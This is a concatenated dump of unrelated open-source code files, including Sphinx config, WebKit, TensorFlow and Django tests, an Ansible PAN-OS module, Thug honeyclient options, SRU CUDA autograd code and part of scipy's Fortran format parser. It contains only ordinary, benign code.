# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandanadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pandana.tex', 'pandana Documentation', 'UrbanSim Inc.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pandana', 'pandana Documentation',
['UrbanSim Inc.'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pandana', 'pandana Documentation',
'UrbanSim Inc.', 'pandana', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
|
christoph-buente/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/QueueStatusServer/model/queues_unittest.py | 123 | # Copyright (C) 2010 Google, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Research in Motion Ltd. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from model.queues import Queue
class QueueTest(unittest.TestCase):
def test_is_ews(self):
mac_ews = Queue("mac-ews")
self.assertTrue(mac_ews.is_ews())
def test_queue_with_name(self):
self.assertEqual(Queue.queue_with_name("bogus"), None)
self.assertEqual(Queue.queue_with_name("mac-ews").name(), "mac-ews")
self.assertRaises(AssertionError, Queue, ("bogus"))
def _assert_short_name(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).short_name(), short_name)
def test_short_name(self):
self._assert_short_name("mac-ews", "Mac")
self._assert_short_name("commit-queue", "Commit")
self._assert_short_name("style-queue", "Style")
def _assert_display_name(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).display_name(), short_name)
def test_display_name(self):
self._assert_display_name("mac-ews", "Mac EWS")
self._assert_display_name("commit-queue", "Commit Queue")
self._assert_display_name("style-queue", "Style Queue")
def _assert_name_with_underscores(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).name_with_underscores(), short_name)
def test_name_with_underscores(self):
self._assert_name_with_underscores("mac-ews", "mac_ews")
self._assert_name_with_underscores("commit-queue", "commit_queue")
def test_style_queue_is_ews(self):
# For now we treat the style-queue as an EWS since most users would
# describe it as such. If is_ews() ever needs to mean "builds the patch"
# or similar, then we will need to adjust all callers.
self.assertTrue(Queue("style-queue").is_ews())
self.assertTrue("style-queue" in map(Queue.name, Queue.all_ews()))
if __name__ == '__main__':
unittest.main()
|
AMDmi3/repology | refs/heads/master | repology/fetchers/fetchers/aur.py | 2 | # Copyright (C) 2016-2019 Dmitry Marakasov <[email protected]>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
import os
import urllib
from typing import Iterable, Iterator, Optional, Tuple
from repology.atomic_fs import AtomicDir
from repology.fetchers import PersistentData, ScratchDirFetcher
from repology.fetchers.http import PoliteHTTP
from repology.logger import Logger
def _split_names_into_urls(prefix: str, package_names: Iterable[str], maxlen: int) -> Iterator[Tuple[str, int]]:
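# Greedily packs names into as few request URLs as fit under maxlen, yielding
# (url, number_of_names_in_this_url) tuples; any trailing partial batch is flushed
# after the loop.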
url_parts = [prefix]
url_length = len(prefix)
for name in package_names:
newpart = '&arg[]=' + urllib.parse.quote(name)
if url_length + len(newpart) > maxlen:
yield ''.join(url_parts), len(url_parts) - 1
url_parts = [prefix, newpart]
url_length = sum(map(len, url_parts))
else:
url_parts.append(newpart)
url_length += len(newpart)
if len(url_parts) > 1:
yield ''.join(url_parts), len(url_parts) - 1
class AURFetcher(ScratchDirFetcher):
def __init__(self, url: str, fetch_timeout: int = 5, fetch_delay: Optional[int] = None, max_api_url_length: int = 4443) -> None:
self.url = url
self.do_http = PoliteHTTP(timeout=fetch_timeout, delay=fetch_delay)
self.max_api_url_length = max_api_url_length # see https://wiki.archlinux.org/index.php/Aurweb_RPC_interface#Limitations
def _do_fetch(self, statedir: AtomicDir, persdata: PersistentData, logger: Logger) -> bool:
packages_url = self.url + 'packages.gz'
logger.get_indented().log('fetching package list from ' + packages_url)
data = self.do_http(packages_url).text # autogunzipped?
package_names = []
for line in data.split('\n'):
line = line.strip()
if line.startswith('#') or line == '':
continue
package_names.append(line)
if not package_names:
raise RuntimeError('Empty package list received, refusing to continue')
logger.get_indented().log('{} package name(s) parsed'.format(len(package_names)))
for num_page, (url, num_packages) in enumerate(_split_names_into_urls(self.url + '/rpc/?v=5&type=info', package_names, self.max_api_url_length)):
logger.get_indented().log('fetching page {} of {} package(s)'.format(num_page + 1, num_packages))
with open(os.path.join(statedir.get_path(), '{}.json'.format(num_page)), 'wb') as statefile:
statefile.write(self.do_http(url).content)
statefile.flush()
os.fsync(statefile.fileno())
return True
|
mrry/tensorflow | refs/heads/windows | tensorflow/python/kernel_tests/matrix_band_part_op_test.py | 21 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class MatrixBandPartTest(tf.test.TestCase):
pass # Filled in below
def _GetMatrixBandPartTest(dtype_, batch_shape_, shape_):
def Test(self):
mat = np.ones(shape_).astype(dtype_)
    batch_mat = np.tile(mat, batch_shape_ + (1, 1))
with self.test_session(use_gpu=True):
for lower in -1, 0, 1, shape_[-2] - 1:
for upper in -1, 0, 1, shape_[-1] - 1:
band_np = mat
if lower >= 0:
band_np = np.triu(band_np, -lower)
if upper >= 0:
band_np = np.tril(band_np, upper)
          if batch_shape_ != ():
            band_np = np.tile(band_np, batch_shape_ + (1, 1))
band = tf.matrix_band_part(batch_mat, lower, upper)
self.assertAllEqual(band_np, band.eval())
return Test
class MatrixBandPartGradTest(tf.test.TestCase):
pass # Filled in below
def _GetMatrixBandPartGradTest(dtype_, batch_shape_, shape_):
def Test(self):
shape = batch_shape_ + shape_
x = tf.constant(np.random.rand(*shape), dtype=dtype_)
with self.test_session(use_gpu=True):
for lower in -1, 0, 1, shape_[-2] - 1:
for upper in -1, 0, 1, shape_[-1] - 1:
y = tf.matrix_band_part(x, lower, upper)
error = tf.test.compute_gradient_error(x, x.get_shape().as_list(), y,
y.get_shape().as_list())
self.assertLess(error, 1e-4)
return Test
if __name__ == '__main__':
for dtype in np.int32, np.int64, np.float32, np.float64:
for batch_shape in ((), (2,), (1, 3, 2)):
for rows in 1, 2, 7:
for cols in 1, 2, 7:
shape = (rows, cols)
name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
setattr(MatrixBandPartTest, 'testMatrixBandPart_' + name,
_GetMatrixBandPartTest(dtype, batch_shape, shape))
if dtype == np.float32 or dtype == np.float64:
setattr(MatrixBandPartGradTest, 'testMatrixBandPartGrad_' + name,
_GetMatrixBandPartGradTest(dtype, batch_shape, shape))
tf.test.main()
|
j00bar/ansible | refs/heads/devel | lib/ansible/modules/network/panos/panos_mgtconfig.py | 78 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: panos_mgtconfig
short_description: configure management settings of device
description:
- Configure management settings of device
author: "Luigi Mori (@jtschichold), Ivan Bojer (@ivanbojer)"
version_added: "2.3"
requirements:
- pan-python
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device
required: true
password:
description:
- password for authentication
required: true
username:
description:
- username for authentication
required: false
default: "admin"
dns_server_primary:
description:
- address of primary DNS server
required: false
default: None
dns_server_secondary:
description:
- address of secondary DNS server
required: false
default: None
panorama_primary:
description:
- address of primary Panorama server
required: false
default: None
panorama_secondary:
description:
- address of secondary Panorama server
required: false
default: None
commit:
description:
- commit if changed
required: false
default: true
'''
EXAMPLES = '''
- name: set dns and panorama
panos_mgtconfig:
ip_address: "192.168.1.1"
password: "admin"
dns_server_primary: "1.1.1.1"
dns_server_secondary: "1.1.1.2"
panorama_primary: "1.1.1.3"
panorama_secondary: "1.1.1.4"
'''
RETURN='''
# Default return values
'''
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
HAS_LIB = True
except ImportError:
HAS_LIB = False
_XPATH_DNS_SERVERS = "/config/devices/entry[@name='localhost.localdomain']" +\
"/deviceconfig/system/dns-setting/servers"
_XPATH_PANORAMA_SERVERS = "/config" +\
"/devices/entry[@name='localhost.localdomain']" +\
"/deviceconfig/system"
def set_dns_server(xapi, new_dns_server, primary=True):
if primary:
tag = "primary"
else:
tag = "secondary"
xpath = _XPATH_DNS_SERVERS+"/"+tag
# check the current element value
xapi.get(xpath)
val = xapi.element_root.find(".//"+tag)
if val is not None:
# element exists
val = val.text
if val == new_dns_server:
return False
element = "<%(tag)s>%(value)s</%(tag)s>" %\
dict(tag=tag, value=new_dns_server)
xapi.edit(xpath, element)
return True
def set_panorama_server(xapi, new_panorama_server, primary=True):
if primary:
tag = "panorama-server"
else:
tag = "panorama-server-2"
xpath = _XPATH_PANORAMA_SERVERS+"/"+tag
# check the current element value
xapi.get(xpath)
val = xapi.element_root.find(".//"+tag)
if val is not None:
# element exists
val = val.text
if val == new_panorama_server:
return False
element = "<%(tag)s>%(value)s</%(tag)s>" %\
dict(tag=tag, value=new_panorama_server)
xapi.edit(xpath, element)
return True
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(required=True, no_log=True),
username=dict(default='admin'),
dns_server_primary=dict(),
dns_server_secondary=dict(),
panorama_primary=dict(),
panorama_secondary=dict(),
commit=dict(type='bool', default=True)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_LIB:
module.fail_json(msg='pan-python is required for this module')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
dns_server_primary = module.params['dns_server_primary']
dns_server_secondary = module.params['dns_server_secondary']
panorama_primary = module.params['panorama_primary']
panorama_secondary = module.params['panorama_secondary']
commit = module.params['commit']
xapi = pan.xapi.PanXapi(
hostname=ip_address,
api_username=username,
api_password=password
)
changed = False
try:
if dns_server_primary is not None:
changed |= set_dns_server(xapi, dns_server_primary, primary=True)
if dns_server_secondary is not None:
changed |= set_dns_server(xapi, dns_server_secondary, primary=False)
if panorama_primary is not None:
changed |= set_panorama_server(xapi, panorama_primary, primary=True)
if panorama_secondary is not None:
changed |= set_panorama_server(xapi, panorama_secondary, primary=False)
if changed and commit:
xapi.commit(cmd="<commit></commit>", sync=True, interval=1)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
module.exit_json(changed=changed, msg="okey dokey")
if __name__ == '__main__':
main()
|
simbha/mAngE-Gin | refs/heads/master | lib/Django 1.7/django/contrib/auth/tests/test_templates.py | 29 | from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.contrib.auth.views import (
password_reset, password_reset_done, password_reset_confirm,
password_reset_complete, password_change, password_change_done,
)
from django.test import RequestFactory, TestCase
from django.test import override_settings
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
ROOT_URLCONF='django.contrib.auth.tests.urls',
)
class AuthTemplateTests(TestCase):
def test_titles(self):
rf = RequestFactory()
user = User.objects.create_user('jsmith', '[email protected]', 'pass')
user = authenticate(username=user.username, password='pass')
request = rf.get('/somepath/')
request.user = user
response = password_reset(request, post_reset_redirect='dummy/')
self.assertContains(response, '<title>Password reset</title>')
self.assertContains(response, '<h1>Password reset</h1>')
response = password_reset_done(request)
self.assertContains(response, '<title>Password reset successful</title>')
self.assertContains(response, '<h1>Password reset successful</h1>')
# password_reset_confirm invalid token
response = password_reset_confirm(request, uidb64='Bad', token='Bad', post_reset_redirect='dummy/')
self.assertContains(response, '<title>Password reset unsuccessful</title>')
self.assertContains(response, '<h1>Password reset unsuccessful</h1>')
# password_reset_confirm valid token
default_token_generator = PasswordResetTokenGenerator()
token = default_token_generator.make_token(user)
uidb64 = force_text(urlsafe_base64_encode(force_bytes(user.pk)))
response = password_reset_confirm(request, uidb64, token, post_reset_redirect='dummy/')
self.assertContains(response, '<title>Enter new password</title>')
self.assertContains(response, '<h1>Enter new password</h1>')
response = password_reset_complete(request)
self.assertContains(response, '<title>Password reset complete</title>')
self.assertContains(response, '<h1>Password reset complete</h1>')
response = password_change(request, post_change_redirect='dummy/')
self.assertContains(response, '<title>Password change</title>')
self.assertContains(response, '<h1>Password change</h1>')
response = password_change_done(request)
self.assertContains(response, '<title>Password change successful</title>')
self.assertContains(response, '<h1>Password change successful</h1>')
|
palaniyappanBala/thug | refs/heads/master | src/ThugAPI/ThugOpts.py | 4 | #!/usr/bin/env python
#
# ThugOpts.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import sys
import os
import datetime
import logging
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
from DOM.Personality import Personality
log = logging.getLogger("Thug")
class ThugOpts(dict):
proxy_schemes = ('http', 'socks4', 'socks5', )
def __init__(self):
self._proxy_info = None
self._proxy = None
self.local = False
self.extensive = False
self._threshold = 0
self._timeout = None
self._timeout_in_secs = None
self.ast_debug = False
self.http_debug = 0
self._useragent = 'winxpie60'
self._referer = 'about:blank'
self._events = list()
self._delay = 0
self._file_logging = False
self._json_logging = False
self._maec11_logging = False
self._no_fetch = False
self._broken_url = False
self._vt_query = False
self._vt_submit = False
self._vt_runtime_apikey = None
self._mongodb_address = None
self._web_tracking = False
self._honeyagent = True
self._cache = '/tmp/thug-cache-%s' % (os.getuid(), )
self.Personality = Personality()
def set_proxy(self, proxy):
p = urlparse.urlparse(proxy)
if p.scheme.lower() not in self.proxy_schemes:
log.warning('[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5)')
sys.exit(0)
self._proxy = proxy
def get_proxy(self):
return self._proxy
proxy = property(get_proxy, set_proxy)
def get_useragent(self):
return self._useragent
def set_useragent(self, useragent):
        if useragent not in self.Personality:
log.warning('[WARNING] Invalid User Agent provided (using default "%s")' % (self._useragent, ))
return
self._useragent = useragent
useragent = property(get_useragent, set_useragent)
def get_referer(self):
return self._referer
def set_referer(self, referer):
self._referer = referer
referer = property(get_referer, set_referer)
def get_events(self):
return self._events
def set_events(self, events):
for e in events.split(","):
self._events.append(e.lower().strip())
events = property(get_events, set_events)
def get_delay(self):
return self._delay
def set_delay(self, timeout):
try:
_timeout = int(timeout)
        except (TypeError, ValueError):
log.warning('[WARNING] Ignoring invalid delay value (should be an integer)')
return
self._delay = abs(_timeout)
delay = property(get_delay, set_delay)
def get_file_logging(self):
return self._file_logging
def set_file_logging(self, file_logging):
self._file_logging = file_logging
file_logging = property(get_file_logging, set_file_logging)
def get_json_logging(self):
return self._json_logging
def set_json_logging(self, json_logging):
self._json_logging = json_logging
json_logging = property(get_json_logging, set_json_logging)
def get_maec11_logging(self):
return self._maec11_logging
def set_maec11_logging(self, maec11_logging):
self._maec11_logging = maec11_logging
maec11_logging = property(get_maec11_logging, set_maec11_logging)
def get_no_fetch(self):
return self._no_fetch
def set_no_fetch(self, fetch):
self._no_fetch = fetch
no_fetch = property(get_no_fetch, set_no_fetch)
def get_cache(self):
return self._cache
def set_cache(self, cache):
self._cache = cache
cache = property(get_cache, set_cache)
def get_threshold(self):
return self._threshold
def set_threshold(self, threshold):
try:
value = int(threshold)
        except (TypeError, ValueError):
log.warning('[WARNING] Ignoring invalid threshold value (should be an integer)')
return
self._threshold = value
threshold = property(get_threshold, set_threshold)
def get_timeout(self):
return self._timeout
def set_timeout(self, timeout):
self._timeout_in_secs = timeout
try:
seconds = int(timeout)
        except (TypeError, ValueError):
log.warning('[WARNING] Ignoring invalid timeout value (should be an integer)')
return
now = datetime.datetime.now()
delta = datetime.timedelta(seconds = seconds)
self._timeout = now + delta
timeout = property(get_timeout, set_timeout)
def get_broken_url(self):
return self._broken_url
def set_broken_url(self, mode):
self._broken_url = mode
broken_url = property(get_broken_url, set_broken_url)
def get_vt_query(self):
return self._vt_query
def set_vt_query(self):
self._vt_query = True
vt_query = property(get_vt_query, set_vt_query)
def get_vt_submit(self):
return self._vt_submit
def set_vt_submit(self):
self._vt_submit = True
vt_submit = property(get_vt_submit, set_vt_submit)
def get_vt_runtime_apikey(self):
return self._vt_runtime_apikey
def set_vt_runtime_apikey(self, vt_apikey):
self._vt_runtime_apikey = vt_apikey
vt_runtime_apikey = property(get_vt_runtime_apikey, set_vt_runtime_apikey)
def get_web_tracking(self):
return self._web_tracking
def set_web_tracking(self, enabled):
self._web_tracking = enabled
web_tracking = property(get_web_tracking, set_web_tracking)
def get_honeyagent(self):
return self._honeyagent
def set_honeyagent(self, enabled):
self._honeyagent = enabled
honeyagent = property(get_honeyagent, set_honeyagent)
def get_mongodb_address(self):
return self._mongodb_address
def set_mongodb_address(self, mongodb_address):
self._mongodb_address = mongodb_address
mongodb_address = property(get_mongodb_address, set_mongodb_address)
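# Rough usage sketch (attribute names mirror the properties above; how the
# instance is attached to Thug's global "log" object is assumed, not shown here):
#   opts = ThugOpts()
#   opts.useragent = 'winxpie60'
#   opts.referer = 'http://www.example.com/'
#   opts.delay = 5000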
|
taolei87/sru | refs/heads/master | sru/cuda_functional.py | 1 | import os
import torch
from torch.autograd import Function
from torch.utils.cpp_extension import load
sources = [
os.path.join(os.path.dirname(__file__), "sru_cuda_impl.cpp"),
os.path.join(os.path.dirname(__file__), "sru_cuda_kernel.cu"),
]
sru_cuda_lib = load(
name="sru_cuda_impl",
sources=sources,
extra_cflags=['-O3'],
verbose=False
)
empty_btensor = torch.ByteTensor()
empty_ftensor = torch.FloatTensor()
class SRU_Compute_GPU(Function):
@staticmethod
def forward(ctx, u, x, weight_c, bias,
init,
activation_type,
d_out,
bidirectional,
has_skip_term,
scale_x,
mask_c=None,
mask_pad=None):
ctx.activation_type = activation_type
ctx.d_out = d_out
ctx.bidirectional = bidirectional
ctx.has_skip_term = has_skip_term
ctx.scale_x = scale_x
# ensure mask_pad is a byte tensor
mask_pad = mask_pad.byte().contiguous() if mask_pad is not None else None
ctx.mask_pad = mask_pad
bidir = 2 if bidirectional else 1
length = x.size(0) if x.dim() == 3 else 1
batch = x.size(-2)
d = d_out
if mask_pad is not None:
assert mask_pad.size(0) == length
assert mask_pad.size(1) == batch
k = u.size(-1) // d
k_ = k // 2 if bidirectional else k
skip_type = 0 if not has_skip_term else (1 if k_ == 3 else 2)
ncols = batch * d * bidir
is_custom = len(weight_c.size()) > 1
size = (length, batch, d * bidir) if x.dim() == 3 else (batch, d * bidir)
c = x.new_zeros(*size)
h = x.new_zeros(*size)
if skip_type > 0 and k_ == 3:
x_ = x.contiguous() * scale_x if scale_x is not None else x.contiguous()
else:
x_ = empty_ftensor
forward_func = sru_cuda_lib.sru_bi_forward if bidirectional else \
sru_cuda_lib.sru_forward
forward_func(
h,
c,
u.contiguous(),
x_,
weight_c.contiguous(),
bias,
init.contiguous(),
mask_c if mask_c is not None else empty_ftensor,
mask_pad.contiguous() if mask_pad is not None else empty_btensor,
length,
batch,
d,
k_,
activation_type,
skip_type,
is_custom
)
ctx.save_for_backward(u, x, weight_c, bias, init, mask_c)
ctx.intermediate = c
if x.dim() == 2:
last_hidden = c
elif bidirectional:
last_hidden = torch.cat((c[-1, :, :d], c[0, :, d:]), dim=1)
else:
last_hidden = c[-1]
return h, last_hidden
@staticmethod
def backward(ctx, grad_h, grad_last):
bidir = 2 if ctx.bidirectional else 1
u, x, weight_c, bias, init, mask_c = ctx.saved_tensors
c = ctx.intermediate
scale_x = ctx.scale_x
mask_pad = ctx.mask_pad
length = x.size(0) if x.dim() == 3 else 1
batch = x.size(-2)
d = ctx.d_out
k = u.size(-1) // d
k_ = k // 2 if ctx.bidirectional else k
skip_type = 0 if not ctx.has_skip_term else (1 if k_ == 3 else 2)
ncols = batch * d * bidir
is_custom = len(weight_c.size()) > 1
grad_u = u.new_zeros(*u.size())
grad_init = x.new_zeros(batch, d * bidir)
grad_x = x.new_zeros(*x.size()) if skip_type > 0 and k_ == 3 else None
grad_bias = x.new_zeros(2, batch, bidir * d)
if not is_custom:
grad_wc = x.new_zeros(2, batch, bidir * d)
else:
grad_wc = weight_c.new_zeros(*weight_c.size())
if skip_type > 0 and k_ == 3:
x_ = x.contiguous() * scale_x if scale_x is not None else x.contiguous()
else:
x_ = empty_ftensor
backward_func = sru_cuda_lib.sru_bi_backward if ctx.bidirectional else \
sru_cuda_lib.sru_backward
backward_func(
grad_u,
grad_x if skip_type > 0 and k_ == 3 else empty_ftensor,
grad_wc,
grad_bias,
grad_init,
u.contiguous(),
x_,
weight_c.contiguous(),
bias,
init.contiguous(),
mask_c if mask_c is not None else empty_ftensor,
mask_pad.contiguous() if mask_pad is not None else empty_btensor,
c,
grad_h.contiguous(),
grad_last.contiguous(),
length,
batch,
d,
k_,
ctx.activation_type,
skip_type,
is_custom
)
if skip_type > 0 and k_ == 3 and scale_x is not None:
grad_x.mul_(scale_x)
if not is_custom:
grad_wc = grad_wc.sum(1).view(-1)
return grad_u, grad_x, grad_wc, grad_bias.sum(1).view(-1), grad_init, \
None, None, None, None, None, None, None
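# SRU_Compute_GPU is a torch.autograd.Function: callers are expected to invoke
# it via ``SRU_Compute_GPU.apply(u, x, weight_c, bias, init, activation_type,
# d_out, bidirectional, has_skip_term, scale_x, mask_c, mask_pad)`` with tensors
# prepared by the SRU cell (a sketch of the expected call only -- the calling
# code lives elsewhere in the package and is not shown here).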
|
nurmd2/nurmd | refs/heads/master | openerp/addons/test_new_api/tests/test_field_conversions.py | 47 | # -*- coding: utf-8 -*-
from openerp import fields
from openerp.tests import common
class TestFieldToColumn(common.TransactionCase):
def test_char(self):
# create a field, initialize its attributes, and convert it to a column
field = fields.Char(string="test string", required=True)
field.setup_base(self.env['res.partner'], 'test')
column = field.to_column()
self.assertEqual(column.string, "test string")
self.assertTrue(column.required)
|
niknow/scipy | refs/heads/master | scipy/io/harwell_boeing/_fortran_format_parser.py | 127 | """
Preliminary module to handle fortran formats for IO. Does not use this outside
scipy.sparse io for now, until the API is deemed reasonable.
The *Format classes handle conversion between fortran and python format, and
FortranFormatParser can create *Format instances from raw fortran format
strings (e.g. '(3I4)', '(10I3)', etc...)
"""
from __future__ import division, print_function, absolute_import
import re
import warnings
import numpy as np
__all__ = ["BadFortranFormat", "FortranFormatParser", "IntFormat", "ExpFormat"]
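# Example of the intended use (a sketch; the exact values follow from the
# parsing rules implemented below):
#   >>> parser = FortranFormatParser()
#   >>> fmt = parser.parse("(3I4)")
#   >>> (fmt.repeat, fmt.width)
#   (3, 4)
#   >>> parser.parse("(10E12.5)").python_format
#   '%11.5E'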
TOKENS = {
"LPAR": r"\(",
"RPAR": r"\)",
"INT_ID": r"I",
"EXP_ID": r"E",
"INT": r"\d+",
"DOT": r"\.",
}
class BadFortranFormat(SyntaxError):
pass
def number_digits(n):
return int(np.floor(np.log10(np.abs(n))) + 1)
class IntFormat(object):
@classmethod
def from_number(cls, n, min=None):
"""Given an integer, returns a "reasonable" IntFormat instance to represent
any number between 0 and n if n > 0, -n and n if n < 0
Parameters
----------
n : int
max number one wants to be able to represent
min : int
minimum number of characters to use for the format
Returns
-------
res : IntFormat
IntFormat instance with reasonable (see Notes) computed width
Notes
-----
Reasonable should be understood as the minimal string length necessary
without losing precision. For example, IntFormat.from_number(1) will
return an IntFormat instance of width 2, so that any 0 and 1 may be
represented as 1-character strings without loss of information.
"""
width = number_digits(n) + 1
if n < 0:
width += 1
repeat = 80 // width
return cls(width, min, repeat=repeat)
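        # For instance, IntFormat.from_number(99) computes number_digits(99) == 2,
        # hence width == 3 and repeat == 80 // 3 == 26, i.e. repr() == "IntFormat(26I3)".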
def __init__(self, width, min=None, repeat=None):
self.width = width
self.repeat = repeat
self.min = min
def __repr__(self):
r = "IntFormat("
if self.repeat:
r += "%d" % self.repeat
r += "I%d" % self.width
if self.min:
r += ".%d" % self.min
return r + ")"
@property
def fortran_format(self):
r = "("
if self.repeat:
r += "%d" % self.repeat
r += "I%d" % self.width
if self.min:
r += ".%d" % self.min
return r + ")"
@property
def python_format(self):
return "%" + str(self.width) + "d"
class ExpFormat(object):
@classmethod
def from_number(cls, n, min=None):
"""Given a float number, returns a "reasonable" ExpFormat instance to
represent any number between -n and n.
Parameters
----------
n : float
max number one wants to be able to represent
min : int
minimum number of characters to use for the format
Returns
-------
res : ExpFormat
ExpFormat instance with reasonable (see Notes) computed width
Notes
-----
Reasonable should be understood as the minimal string length necessary
to avoid losing precision.
"""
# len of one number in exp format: sign + 1|0 + "." +
# number of digit for fractional part + 'E' + sign of exponent +
# len of exponent
